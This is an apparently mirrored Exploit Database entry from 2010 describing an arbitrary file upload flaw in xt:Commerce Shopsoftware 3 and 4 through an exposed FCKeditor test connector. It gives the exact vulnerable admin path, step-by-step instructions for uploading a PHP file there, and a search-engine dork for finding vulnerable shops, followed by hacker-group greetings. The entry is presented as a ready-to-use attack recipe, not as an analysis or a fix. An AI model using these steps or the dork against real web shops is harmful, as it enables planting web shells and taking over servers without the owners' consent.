xt:Commerce Shopsoftware 3/4 – ‘FCKeditor’ Arbitrary File Upload

• Exploit Database
• 10 阅读

• 作者： Net.Edit0r
  日期： 2010-11-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15455/

• =============================================================
  xt:Commerce Shopsoftware (fckeditor) File Upload Vulnerability
  =============================================================
  ###################################################
  #
  # Exploit Title: xt:Commerce Shopsoftware (fckeditor)
  # Date: 08/11/2010
  # Author: Net.Edit0r
  # Software Link: www.xt-commerce.com/
  # Version: 3 & 4
  # Tested on: Linux Ubuntu 9.04
  # dork : "eCommerce Engine © 2006 xt:Commerce Shopsoftware"
  # Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
  #
  ####################################################
  
  exploit # admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
  
  first go to # http://site.com/[shop]
  
   then # http://site.com/[shop]/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
  
   select # Select the "File Uploader"> php ... upload to : Uploaded
  File URL:
  
  Demo : http://www.site.com/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
  
  Demo : http://www.site.com/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
  
  #######################################################
  
  Home : datacoders.org ~ ajaxtm.com #Iranian HackerZ
  
  >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  
  Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , Zalatan , P0W3RFU7
   BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ B3hz4d ~ Raiden ~ m4hd1